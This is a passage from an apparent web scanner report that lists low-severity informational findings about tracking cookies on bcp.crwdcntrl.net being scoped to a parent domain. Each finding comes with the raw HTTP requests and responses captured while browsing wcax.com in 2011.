Set-Cookie: aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:40 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:29 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs

Response